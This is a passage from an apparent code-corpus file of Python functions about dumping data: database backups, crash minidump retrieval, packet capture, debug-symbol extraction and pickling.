os.path.split(src)\n debug_dir = os.path.join(dirname, \".debug\")\n qisys.sh.mkdir(debug_dir)\n dest = os.path.join(src, debug_dir, basename)\n to_run = list()\n to_run.append([objcopy, \"--only-keep-debug\", src, dest])\n to_run.append([objcopy,\n \"--strip-debug\",\n \"--strip-unneeded\",\n \"--add-gnu-debuglink=%s\" % dest,\n src])\n try:\n for cmd in to_run:\n qisys.command.check_output(cmd, stderr=subprocess.STDOUT)\n ui.info(\"-- Debug info extracted for\", src)\n except qisys.command.CommandFailedException as e:\n ui.error(\"Error while Extracting package debug for %s\" % src)\n ui.error(str(e))\n # After the commands have run, utime of the file has changed, causing\n # cmake to re-install the libraries. Which is not cool ...\n # So set back mtime to its previous value:\n os.utime(src, (src_stat.st_atime, src_stat.st_mtime))", "def test_execute_dump_site_transaction(self):\n\n instruction = Instruction(\"dump(3)\")\n\n with std_out() as (out, err):\n self.transaction_manager.execute(instruction)\n\n output = out.getvalue().strip()\n self.assertEqual(output, \"{'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}\")", "def backup_dump(self):\n errors = Queue.Queue()\n threads = []\n for host in self.shards:\n t = threading.Thread(target=host.mongodump, args=(errors,))\n threads.append(t)\n if self.config_server is not None:\n t = threading.Thread(target=self.config_server.mongodump, args=(errors,))\n threads.append(t)\n for thread in threads:\n thread.start()\n for thread in threads:\n thread.join()\n if not errors.empty():\n # We don't really care for all errors, so just through the first one\n raise Exception(errors.get())", "def clean_dump(filename):\n from .utils import clean_dump as clean\n click.echo('Starting to cleaning {}'.format(filename))\n clean(filename)\n click.echo('Finished cleaning {}'.format(filename))", "def PullDumps(self, host_dir):\n # The device/emulator's clock might be off from the host, so calculate an\n # offset that can be added to the host time to get the corresponding device\n # time.\n # The offset is (device_time - host_time), so a positive value means that\n # the device clock is ahead.\n time_offset = self.GetDeviceHostClockOffset()\n\n stdout, _ = self.RunCmdOnDevice(\n ['ls', '-1', cmd_helper.SingleQuote(self.CROS_MINIDUMP_DIR)])\n device_dumps = stdout.splitlines()\n for dump_filename in device_dumps:\n host_path = os.path.join(host_dir, dump_filename)\n # Skip any ignored files since they're not useful and could be deleted by\n # the time we try to pull them.\n if _IsIgnoredFileType(dump_filename):\n continue\n if os.path.exists(host_path):\n continue\n device_path = cmd_helper.SingleQuote(\n posixpath.join(self.CROS_MINIDUMP_DIR, dump_filename))\n # Skip any directories that happen to be in the list.\n stdout, _ = self.RunCmdOnDevice(['test', '-f', device_path, '&&',\n 'echo', 'true', '||', 'echo', 'false'])\n if 'false' in stdout:\n continue\n # Skip any files that have a corresponding .lock file, as that implies the\n # file hasn't been fully written to disk yet.\n device_lock_path = device_path + '.lock'\n if self.FileExistsOnDevice(device_lock_path):\n logging.debug('Not pulling file %s because a .lock file exists for it',\n device_path)\n continue\n try:\n self.GetFile(device_path, host_path)\n except Exception as e: # pylint: disable=broad-except\n logging.error('Failed to get file %s: %s', 
device_path, e)\n continue\n # Set the local version's modification time to the device's.\n stdout, _ = self.RunCmdOnDevice(\n ['ls', '--time-style', '+%s', '-l', device_path])\n stdout = stdout.strip()\n # We expect whitespace-separated fields in this order:\n # mode, links, owner, group, size, mtime, filename.\n # Offset by the difference of the device and host clocks.\n device_mtime = int(stdout.split()[5])\n host_mtime = device_mtime - time_offset\n os.utime(host_path, (host_mtime, host_mtime))", "def dump(self):\n self.dumpInit.emit()\n\n worker = DumpThread()\n thread = QtCore.QThread(self)\n self.__thread_maps['dump'] = [thread, worker]\n worker.moveToThread(thread)\n\n worker.dumpSig.connect(self.dumpSig)\n worker.dumpDone.connect(self.dumpDone)\n thread.started.connect(worker.dump)\n\n thread.start()", "def test_dump_call_pgdump(mocker):\n mocker.patch('subprocess.Popen')\n assert pgdump.dump(url)\n subprocess.Popen.assert_called_with(['pg_dump' , url] , stdout=subprocess.PIPE)", "def do_before_dump(self):\n self.checksummer.prepare_checksums()", "def dump(self, dump_path: str):\n if self.parsed_data is None:\n raise ValueError(f'{self.resource_name} -- no parsed data to dump '\n f'(hint: call `parse` method first)')\n dump(path=dump_path, data=self.parsed_data, resource_name=self.resource_name)", "def includeInDump(self):\n pass", "def dumpMetaServerChunkMap(metaServer, dumpMetaFile, defaultMetaFile, defaultCheckPoint):\n\n # Get latest checkpoint file\n # Gzip latest file and copy it locally\n print \"Compressing latest checkpoint %s on %s\" % (defaultCheckPoint, metaServer.node)\n if not os.path.exists(\"./checkpointdir\"):\n command = \"mkdir ./checkpointdir\"\n os.system(command)\n command = \"ssh -o StrictHostKeyChecking=no %s gzip -c %s > ./checkpointdir/latest.gz\" % (metaServer.node, defaultCheckPoint)\n os.system(command)\n\n #print \"Copying latest checkpoint file %s.gz\" % defaultCheckPoint\n #command = \"scp -o StrictHostKeyChecking=no %s:%s.gz ./checkpointdir\" % (metaServer.node, defaultCheckPoint)\n #os.system(command)\n\n print \"Uncompressing latest checkpoint ./checkpointdir/latest.gz\" \n command = \"gunzip -f ./checkpointdir/latest.gz\"\n os.system(command)\n \n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((metaServer.node, metaServer.port))\n req = \"DUMP_CHUNKTOSERVERMAP\\r\\nVersion: KFS/1.0\\r\\nCseq: 1\\r\\n\\r\\n\"\n sock.send(req)\n sockIn = sock.makefile('r')\n for line in sockIn:\n if line.find('OK') == 0:\n continue\n if line.find('Cseq') == 0:\n continue\n if line.find('Status') == 0:\n continue\n if line.find('\\r\\n') == 0:\n break\n sock.close()\n \n # Gzip the file and scp over to dumMetaFile.gz and extract it\n print \"Compressing chunk map dump %s on %s\" % (defaultMetaFile, metaServer.node)\n command = \"ssh -o StrictHostKeyChecking=no %s gzip -f %s\" % (metaServer.node, defaultMetaFile)\n os.system(command)\n print \"Copying chunk map dump %s.gz to %s.gz\" % (defaultMetaFile, dumpMetaFile)\n command = \"scp -o StrictHostKeyChecking=no %s:%s.gz %s.gz\" % (metaServer.node, defaultMetaFile, dumpMetaFile)\n os.system(command)\n print \"Uncompressing chunk map dump %s.gz\" % (dumpMetaFile)\n command = \"gunzip -f %s.gz\" % dumpMetaFile\n os.system(command)\n\n print \"Creating symlink chunkmap.txt to %s\" % (dumpMetaFile)\n command = \"rm chunkmap.txt\"\n os.system(command)\n command = \"ln -s %s chunkmap.txt\" % (dumpMetaFile)\n os.system(command)", "def dump():\n global CACHE\n return CACHE", "def 
memory(kdump_memory):\n config_db = ConfigDBConnector()\n if config_db is not None:\n config_db.connect()\n config_db.mod_entry(\"KDUMP\", \"config\", {\"memory\": kdump_memory})", "def dumpMemory():\n libxml2mod.xmlDumpMemory()", "def pump_and_dump(func, article_id, start, end, dump_dir):\n \n data = func(article_id, start, end)\n \n dump_dir = dump_dir\n ref = start[:16] + '--' + end[:16] + '--' + 'threadtemp'\n file = dump_dir +'/' + ref + '.pickle'\n\n with open(file, 'wb') as f:\n pickle.dump(data, f)", "def dumbcache_load(cache_dir=r'data\\cache'):\n DUMBCACHE = os.path.join(r'..', cache_dir, r'br_store.dmp')\n with open(DUMBCACHE, 'rb') as f:\n return pkl.load(f)", "def genDump(exePath,inputDict,outputDict):\n paramFile = path.join(path.dirname(inputDict),'damo.par')\n with open(paramFile,'w') as f:\n f.write('DUMP'+'\\n')\n f.write(inputDict+'\\n')\n f.write(outputDict)\n runDamocles(exePath, paramFile)\n remove(paramFile)", "def dump(args):\n if args.dump_command == \"trace\":\n _dump_trace(args)\n elif args.dump_command == \"checkpoint\":\n _dump_checkpoint(args)\n elif args.dump_command == \"config\":\n _dump_config(args)\n else:\n raise ValueError()", "def daily(dbname, as_username='postgres'):\n\n filename = '{dbname}-{indate}.dump.sql'.format(\n dbname=dbname, indate=datetime.now().strftime('%Y-%m-%d'))\n backup_daily_dir = os.path.join(BACKUPS_STORE_DIR, 'daily')\n if not os.path.isdir(backup_daily_dir):\n os.makedirs(backup_daily_dir)\n\n dumpfile = execute_pgdump(dbname, as_username)\n dst = os.path.join(backup_daily_dir, filename)\n logger.info('moving {src} into {dst}'.format(src=dumpfile, dst=dst))\n shutil.move(dumpfile, dst)\n logger.info('{dst} has a size of {size} bytes.'.format(\n dst=dst, size=get_file_size(dst)))", "def mmfile(filename, dump, size):\n f = open(filename, 'w')\n filesize = 0\n while(filesize < size):\n f.write(dump)\n filesize = os.path.getsize(filename)\n return filesize", "def safe_dump(filename: str, data, use_lock=True, use_temp=True, lock_timeout=10) -> bool:\n temp_fname = 'temp.' + filename\n lock_fname = 'lock.' 
+ filename\n\n def safe_dump_inner():\n if use_temp:\n dump(temp_fname, data)\n os.replace(temp_fname, filename)\n return True\n else:\n return dump(temp_fname, data)\n\n if use_lock:\n with FileLock(lock_fname, lock_timeout) as flock:\n if flock.is_locked:\n return safe_dump_inner()\n else:\n logger.warning('Cannot lock the file: {}.'.format(filename))\n return False\n else:\n return safe_dump_inner()", "def do_before_job(self, dump_items):\n self.runinfo.save_dump_runinfo(\n RunInfo.report_dump_runinfo(dump_items))", "def __init__(self, dump_finder, build_dir, symbols_dir=None):\n # Map from minidump path (string) to minidump_dump output (string).\n self._minidump_dump_output = {}\n # Map from minidump path (string) to the directory that should be used when\n # looking for symbol binaries (string).\n self._minidump_symbol_binaries_directories = {}\n # We use the OS/arch of the host, not the device.\n super(AndroidMinidumpSymbolizer, self).__init__(\n platform.system().lower(), platform.machine(), dump_finder, build_dir,\n symbols_dir=symbols_dir)", "def run_backup():\n host = re.search(\"([\\w.-]+)[:]?\", env.host).group()\n date = time.strftime('%Y%m%d%H%M%S')\n fname = '%(host)s-backup-%(date)s.gz' % {'date': date, 'host': host}\n green(\"Ingrese la contraseña de la clave privada local.\")\n sudo(\"pg_dump kine | gzip > /tmp/%s\" % fname, user=\"postgres\")\n get(\"/tmp/%s\" % fname, os.path.join(backup_dir, fname))\n sudo(\"rm /tmp/%s\" % fname, user=\"postgres\")", "def runDump(self, listDump):\n\n if isinstance(listDump, list) is False:\n raise KeyError(\"listDump must be a list\")\n\n logger.debug(\"listDump: %s\", listDump)\n\n commandService = Command()\n\n\n for dump in listDump:\n \n try:\n logger.info(\"Dumping %s/%s in %s\" % (dump['service']['stack']['name'], dump['service']['name'], dump['target_dir']))\n environments = \"\"\n for env in dump['environments']:\n environments += \" -e '%s'\" % env.replace(':', '=')\n \n \n if 'entrypoint' in dump:\n entrypoint = \"--entrypoint='%s'\" % dump['entrypoint']\n else:\n entrypoint = ''\n \n # Check if folder to receive dump exist, else create it\n if os.path.isdir(dump['target_dir']) is False:\n os.makedirs(dump['target_dir'])\n logger.debug(\"Create directory '%s'\", dump['target_dir'])\n else:\n logger.debug(\"Directory '%s' already exist\", dump['target_dir'])\n \n commandService.runCmd(\"docker pull %s\" % dump['image'])\n \n for command in dump['commands']:\n dockerCmd = \"docker run --rm %s -v %s:%s %s %s %s\" % (entrypoint, dump['target_dir'], dump['target_dir'], environments, dump['image'], command)\n commandService.runCmd(dockerCmd)\n logger.info(\"Dump %s/%s is finished\" % (dump['service']['stack']['name'], dump['service']['name']))\n \n except Exception as e:\n logger.error(\"Error appear when dump '%s/%s', skip : %s\" % (dump['service']['stack']['name'], dump['service']['name'], e.message))\n # Don't beack backup if somethink wrong\n pass", "def test_execute_dump_var_transaction(self):\n\n instruction = Instruction(\"dump(3)\")\n\n with std_out() as (out, err):\n self.transaction_manager.execute(instruction)\n\n output = out.getvalue().strip()\n self.assertEqual(output, \"{'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}\")", "def start_tcpdump(self):\n\t\tlog_file = os.path.join(self.cfg.file_log_dir,self.info[\"hash_md5\"]+\".pcap\")\n\t\tself.info[\"tcpdump_log_path\"] 
= log_file\n\t\tcmd = [\"/usr/sbin/tcpdump\", \"-iany\", \"-w\"+self.info[\"tcpdump_log_path\"], \"-c%d\"%(self.cfg.tcpdump_limit)]\n\t\tself.p_tcpdump = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\tself.log.info(\"tcpdump starts, logfile:%s\",self.info[\"tcpdump_log_path\"] )", "def xmlrpc_start(self, iface, expr, promisc=False, options=None):\n\n # Fail if there is already a tcpdump instance (started by us) running.\n if self._proc is not None and self._proc.active():\n error(\"Tcpdump already started!\")\n defer.returnValue(None)\n\n # FIXME: -Z?\n cmd = [self._daemon, \"-i\", iface, \"-w\", \"-\"]\n if options is not None and options['tcpdump_snaplen']:\n cmd.extend(['-s', str(options['tcpdump_snaplen'])])\n if not promisc:\n cmd.append(\"-p\")\n\n cmd.append(expr)\n dir = \"/mnt/scratch/%s/tcpdump\" % Node().getHostname()\n\n try:\n os.mkdir(dir)\n os.chmod(dir, 0777)\n except OSError, inst:\n if inst.errno != errno.EEXIST:\n error(inst)\n defer.returnValue(None)\n\n try:\n temp_fd, temp_file = mkstemp(suffix=\".pcap\", dir=dir)\n os.chmod(temp_file, 0666)\n except OSError, inst:\n error(inst)\n defer.returnValue(None)\n\n self._proc = _TcpdumpProtocol()\n debug(\"spawnProcess: %s\" %cmd)\n reactor.spawnProcess(self._proc, self._daemon, args = cmd, path='/',\n childFDs = {1: temp_fd, 2: \"r\"})\n os.close(temp_fd)\n\n success, status, stderr = yield self._proc.deferred()\n\n if not success:\n error(\"Tcpdump failed (exit status: %s):\" % status)\n error(stderr)\n os.unlink(temp_file)\n defer.returnValue(None)\n else:\n info(\"Tcpdump started.\")\n defer.returnValue(temp_file)", "def snapshot_mib(self):\n db_copy = None\n number_of_commands = None\n\n try:\n max_tries = MibResyncTask.max_db_copy_retries - 1\n\n for retries in range(0, max_tries + 1):\n # Send MIB Upload so ONU snapshots its MIB\n try:\n self.strobe_watchdog()\n number_of_commands = yield self.send_mib_upload()\n\n if number_of_commands is None:\n if retries >= max_tries:\n db_copy = None\n break\n\n except (TimeoutError, ValueError) as e:\n self.log.warn('timeout-or-value-error', e=e)\n if retries >= max_tries:\n raise\n\n self.strobe_watchdog()\n yield asleep(MibResyncTask.db_copy_retry_delay)\n continue\n\n # Get a snapshot of the local MIB database\n db_copy = self._device.query_mib()\n # if we made it this far, no need to keep trying\n break\n\n except Exception as e:\n self.log.exception('mib-resync', e=e)\n raise\n\n # Handle initial failures\n\n if db_copy is None or number_of_commands is None:\n raise MibCopyException('Failed to snapshot MIB copy after {} retries'.\n format(MibResyncTask.max_db_copy_retries))\n\n returnValue((db_copy, number_of_commands))", "def dump(self, tag=None):\n return self.dump_to(sys.stdout.buffer, tag=tag)", "def weekly(dbname, as_username='postgres'):\n\n filename = '{dbname}-{indate}.dump.sql'.format(\n dbname=dbname, indate=datetime.now().strftime('%Y-%m-%d'))\n backup_weekly_dir = os.path.join(BACKUPS_STORE_DIR, 'weekly')\n if not os.path.isdir(backup_weekly_dir):\n os.makedirs(backup_weekly_dir)\n\n dumpfile = execute_pgdump(dbname, as_username)\n filename = os.path.join(backup_weekly_dir, filename)\n logger.info('moving {src} into {dst}'.format(src=dumpfile, dst=filename))\n shutil.move(dumpfile, filename)\n logger.info('{dst} has a size of {size} bytes.'.format(\n dst=filename, size=get_file_size(filename)))", "def FullDump(reader, heap):\n def dump_region(reader, start, size, location):\n print()\n while start & 3 != 0:\n start += 1\n size -= 1\n 
location += 1\n is_executable = reader.IsProbableExecutableRegion(location, size)\n is_ascii = reader.IsProbableASCIIRegion(location, size)\n\n if is_executable is not False:\n lines = reader.GetDisasmLines(start, size)\n for line in lines:\n print(FormatDisasmLine(start, heap, line))\n print()\n\n if is_ascii is not False:\n # Output in the same format as the Unix hd command\n addr = start\n for i in range(0, size, 16):\n slot = i + location\n hex_line = \"\"\n asc_line = \"\"\n for i in range(16):\n if slot + i < location + size:\n byte = ctypes.c_uint8.from_buffer(reader.minidump, slot + i).value\n if byte >= 0x20 and byte < 0x7f:\n asc_line += chr(byte)\n else:\n asc_line += \".\"\n hex_line += \" %02x\" % (byte)\n else:\n hex_line += \" \"\n if i == 7:\n hex_line += \" \"\n print(\"%s %s |%s|\" % (reader.FormatIntPtr(addr),\n hex_line,\n asc_line))\n addr += 16\n\n if is_executable is not True and is_ascii is not True:\n print(\"%s - %s\" % (reader.FormatIntPtr(start),\n reader.FormatIntPtr(start + size)))\n print(start + size + 1);\n for i in range(0, size, reader.PointerSize()):\n slot = start + i\n maybe_address = reader.ReadUIntPtr(slot)\n heap_object = heap.FindObject(maybe_address)\n print(\"%s: %s\" % (reader.FormatIntPtr(slot),\n reader.FormatIntPtr(maybe_address)))\n if heap_object:\n heap_object.Print(Printer())\n print()\n\n reader.ForEachMemoryRegion(dump_region)", "def run(self, pdb_file):\n wd = os.getcwd()\n base = os.path.basename(pdb_file)\n\n with TempFolder() as tmp:\n shutil.copy(os.path.expanduser(pdb_file), tmp.name)\n os.chdir(tmp.name)\n Shell.run('{0} {1} {2}'.format(self.binary,\n os.path.join(tmp.name, base),\n self.acc))\n summary = '.'.join([os.path.splitext(base)[0], 'sum'])\n out = self.parse(os.path.join(tmp.name, summary))\n os.chdir(wd)\n\n return out", "def dump(self):\n for cache_set in self.cache_sets:\n cache_set.dump()", "def coredump(ctx, config):\n log.info('Enabling coredump saving...')\n archive_dir = misc.get_archive_dir(ctx)\n run.wait(\n ctx.cluster.run(\n args=[\n 'install', '-d', '-m0755', '--',\n '{adir}/coredump'.format(adir=archive_dir),\n run.Raw('&&'),\n 'sudo', 'sysctl', '-w', 'kernel.core_pattern={adir}/coredump/%t.%p.core'.format(adir=archive_dir),\n ],\n wait=False,\n )\n )\n\n try:\n yield\n finally:\n run.wait(\n ctx.cluster.run(\n args=[\n 'sudo', 'sysctl', '-w', 'kernel.core_pattern=core',\n run.Raw('&&'),\n # don't litter the archive dir if there were no cores dumped\n 'rmdir',\n '--ignore-fail-on-non-empty',\n '--',\n '{adir}/coredump'.format(adir=archive_dir),\n ],\n wait=False,\n )\n )\n\n # set status = 'fail' if the dir is still there = coredumps were\n # seen\n for rem in ctx.cluster.remotes.iterkeys():\n r = rem.run(\n args=[\n 'if', 'test', '!', '-e', '{adir}/coredump'.format(adir=archive_dir), run.Raw(';'), 'then',\n 'echo', 'OK', run.Raw(';'),\n 'fi',\n ],\n stdout=StringIO(),\n )\n if r.stdout.getvalue() != 'OK\\n':\n log.warning('Found coredumps on %s, flagging run as failed', rem)\n set_status(ctx.summary, 'fail')\n if 'failure_reason' not in ctx.summary:\n ctx.summary['failure_reason'] = \\\n 'Found coredumps on {rem}'.format(rem=rem)", "def snapshot(self, instance, name):\n # TODO(imsplitbit): Need to implement vzdump\n pass", "def dumpme(self) :\n fileName = \"./data/oP4_ModelBuilder.dump\"\n with open(fileName,\"wb\") as dumpedFile:\n oPickler = pickle.Pickler(dumpedFile)\n oPickler.dump(self)", "def parse_dump_file(self, ws_dump, ws_dest, fn_dump):\n self.message('BEGIN: [{}] -> 
[{}]:'.format(fn_dump.upper(), self.fn_destination.upper()), True)\n dump_headers = {} # column headers from our dump file\n dest_headers = {} # column headers from our destination file\n comm_headers = {} # column headers common to both files\n\n rows_updated = 0\n rows_appended = 0\n\n # get a list of dump column headers so we can use them for searching\n for x, cell in enumerate(ws_dump[1]):\n dump_headers[cell.value] = x + 1\n\n # get a list of destination column headers so we can use them for searching\n for x, cell in enumerate(ws_dest[1]):\n dest_headers[cell.value] = x + 1\n\n # get a list of column headers from both sheets using column locations from destination\n for key1, val1 in dest_headers.items():\n for key2, val2 in dump_headers.items():\n if key1 == key2:\n comm_headers[key1] = val1\n break\n\n # now parse our dump file to arg_check for duplicate 'keys'\n if self.worksheet_has_duplicate_keys(ws_dump, fn_dump):\n return\n\n # now parse our destination file to arg_check for duplicate 'keys'\n if self.worksheet_has_duplicate_keys(ws_dest, self.fn_destination):\n return\n\n # let's case-sensitive arg_check our column headers for differences if any.\n s1 = set(dump_headers)\n s2 = set(dest_headers)\n\n if s1 != s2:\n s1_diff = (s1 - s2)\n s2_diff = (s2 - s1)\n if len(s1_diff) > 0:\n self.warning('{} exclusively contains the following columns: '.format(fn_dump.upper()))\n for x, item in enumerate(s1_diff):\n self.warning('\\t{}. \\'{}\\''.format(x + 1, str(item)))\n if len(s2_diff) > 0:\n self.warning('{} exclusively contains the following columns: '.format(self.fn_destination.upper()))\n for x, item in enumerate(s2_diff):\n self.warning('\\t{}. \\'{}\\''.format(x + 1, str(item)))\n\n dump_dict = self.parse_worksheet_into_dictionary(ws_dump, comm_headers)\n dest_dict = self.parse_worksheet_into_dictionary(ws_dest, comm_headers)\n comb_dict = {**dest_dict, **dump_dict}\n\n for a, b in enumerate(comb_dict): # enumerate dictionary key\n key = b\n dump_row = dump_dict[key]\n for c, d in enumerate(dump_row): # enumerate dictionary rows\n value = dump_row[d]['value']\n result = self.get_cell_details(ws_dest, key, d)\n if result['cell_found']: # does this key exist in destination\n this = ws_dest.cell(row=dest_dict[b][d]['row'], column=dest_dict[b][d]['col'])\n if this.value != value: # update destination cell\n self.cells_updated += 1\n self.format_cell_updated(this, value)\n else:\n self.format_cell_reset(this)\n else: # key is not present so we are creating a new row\n if result['key_found']: # we need to add the remaining values for columns\n this = ws_dest.cell(row=result['row'], column=result['col'])\n else: # append a new row and add the primary key\n this = ws_dest.cell(row=ws_dest.max_row + 1, column=comm_headers[d])\n\n self.format_cell_updated(this, value)\n self.rows_appended += 1\n\n if self.is_date(this.value):\n if self.format_date(this.value) < self.format_date(datetime.now()):\n self.format_cell_date_passed(this)\n\n # save our workbook with all changes\n self.cells_updated += rows_updated\n self.rows_appended += rows_appended\n self.message('END: [{}] [Updates: {}] [Additions: {}]'.format(fn_dump.upper(), rows_updated, rows_appended))\n\n # set the active worksheet so it opens on this tab\n if not self.arg_check:\n self.wb_destination.active = self.wb_destination['Hypercare Incidents']\n self.wb_destination.save(self.fn_destination)", "def execute_pgdump(dbname, as_username='postgres'):\n\n filedescriptor, filename = tempfile.mkstemp()\n statement = 
get_database_backup_statement(filename, dbname, as_username)\n BackupterStart.send(statement)\n os.system(statement)\n BackupterEnd.send(filename)\n\n return filename", "def load_dump(self):\n # Create uuid extension\n command = \"CREATE EXTENSION IF NOT EXISTS \\\"uuid-ossp\\\";\"\n try:\n self.cursor.execute(command)\n except:\n # uuid extension already exists\n pass\n print(\"uuid extension couldn't be created\")\n\n path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'SQL', 'fa2909.sql')\n try:\n self.cursor.execute(open(path, \"r\").read())\n print('table was created successfully')\n return True\n except:\n # error\n print(\"table couldn't be created\")\n return False", "def mysqldump():\n run(\"mysqldump -u database_user database_name -p > ~/tmp/exported_db.sql\")", "def dumpfile(self, dump_path, abspath=True):\n if dump_path is None:\n self._p('[dumpfile] (null)')\n else:\n if abspath:\n dump_path = os.path.abspath(dump_path)\n self._p('[dumpfile] \"{}\"'.format(dump_path))", "def test_execute_dump_all_transaction(self):\n\n instruction = Instruction(\"dump()\")\n\n with std_out() as (out, err):\n self.transaction_manager.execute(instruction)\n\n output = out.getvalue().strip()\n\n self.assertEqual(output, \"{1: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 2: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x11': { x11: 110 }, 'x12': { x12: 120 }, 'x1': { x1: 10 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 3: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 4: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x3': { x3: 30 }, 'x12': { x12: 120 }, 'x13': { x13: 130 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 5: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 6: {'x14': { x14: 140 }, 'x20': { x20: 200 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x15': { x15: 150 }, 'x4': { x4: 40 }, 'x5': { x5: 50 }}, 7: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 8: {'x14': { x14: 140 }, 'x20': { x20: 200 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x7': { x7: 70 }, 'x4': { x4: 40 }, 'x17': { x17: 170 }}, 9: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 10: {'x19': { x19: 190 }, 'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x9': { x9: 90 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}}\")", "def dump(self, obj):\r\n return self.localpath.dump(obj)", "def 
minimize(self,amberpdbpath,pdbfile,amberminpath):\n minfile=os.path.join(self.mainpath,'min.in')\n res='';pdbname=os.path.join(amberpdbpath,pdbfile);leap=os.path.join(amberpdbpath,'leap.in')\n top=os.path.join(amberpdbpath,pdbfile+'.prmtop');crd=os.path.join(amberpdbpath,pdbfile+'.inpcrd')\n rst=os.path.join(amberpdbpath,pdbfile+'min.rst');minout=os.path.join(amberpdbpath,'min.out')\n res+='source leaprc.protein.ff14SB' +'\\n'\n res+='source leaprc.gaff' +'\\n'\n res+='source leaprc.water.tip3p' +'\\n'\n res+='com=loadpdb '+pdbname +'\\n'\n res+='setbox com \"vdw\"' +'\\n'\n res+='addIons com Na+ 0' +'\\n'\n res+='addIons com Cl- 0'+'\\n'\n res+='saveamberparm com '+top+' '+crd +'\\n'\n res+='quit'\n f=open(leap,'w');f.write(res);f.close()\n os.system('tleap -s -f '+leap)\n os.system('pmemd -O -i '+minfile+' -p '+top+' -c '+crd+' -r '+rst+' -ref '+pdbname+'.inpcrd -o '+minout)\n res='';res+='parm '+top+'\\n';res+='trajin '+rst+'\\n';res+='strip :WAT,Na+,Cl- \\n';res+='trajout '+rst+'stri \\n'\n f=open(leap,'w');f.write(res);f.close()\n os.system('cpptraj < '+leap) \n res='';res+='parm '+top+'\\n';res+='parmstrip :WAT,Na+,Cl- \\n';res+='parmwrite out '+top+'stri \\n'\n f=open(leap,'w');f.write(res);f.close()\n os.system('cpptraj < '+leap) \n os.system('ambpdb -p '+top+'stri -c '+rst+'stri > '+amberminpath+'/'+pdbfile+'.pdb')", "def get_idumpload(self):\n return self.read_register(4102, 1, 3)", "def dump_DB(self):\n\t\tprint 'Dumping Data Base...'\n\t\tp=cPickle.Pickler(open(self.DB_file, 'wb'))\n\t\tp.fast=True\n\t\tp.dump(self.DB)\n\t\tprint 'Dumping completed'\n\t\t#stream.close()\n\t\t#return ", "def _run_operation(self, operation, logdir):\n op_start_time = datetime.datetime.now()\n drush_cmd = subprocess.Popen([self.drupal.drush_bin,\n \"--root=\" + self.drupal.root,\n \"--uri=\" + self.drupal.uri,\n \"maps-import\",\n str(self.id),\n \"--op=\" + operation],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n (drush_out, drush_err) = drush_cmd.communicate()\n op_end_time = datetime.datetime.now()\n\n self._log_operation(operation, logdir,\n drush_out, drush_err)\n self._update_operation_state(operation, op_start_time, op_end_time)", "def profile(script, argv, timer, pickle_protocol, dump_filename, mono):\n filename, code, globals_ = script\n sys.argv[:] = [filename] + list(argv)\n __profile__(filename, code, globals_,\n timer=timer, pickle_protocol=pickle_protocol,\n dump_filename=dump_filename, mono=mono)", "def madmp_import(file, dry_run, hard_sync):\n if not file or not os.path.isfile(file):\n click.secho(\"'%s' is not a file\" % file, file=sys.stderr, fg=\"red\")\n return\n\n with open(file, \"r\") as dmp_file:\n dmp_dict = json.load(dmp_file).get(\"dmp\", {})\n dmp = convert_dmp(dmp_dict, hard_sync=hard_sync)\n\n click.echo(\"DMP %s has %s datasets\" % (dmp.dmp_id, len(dmp.datasets)))\n\n for dataset in dmp.datasets:\n recid = \"[no record]\"\n\n if dataset.record:\n pid = dataset.record.pid\n recid = \"[recid: 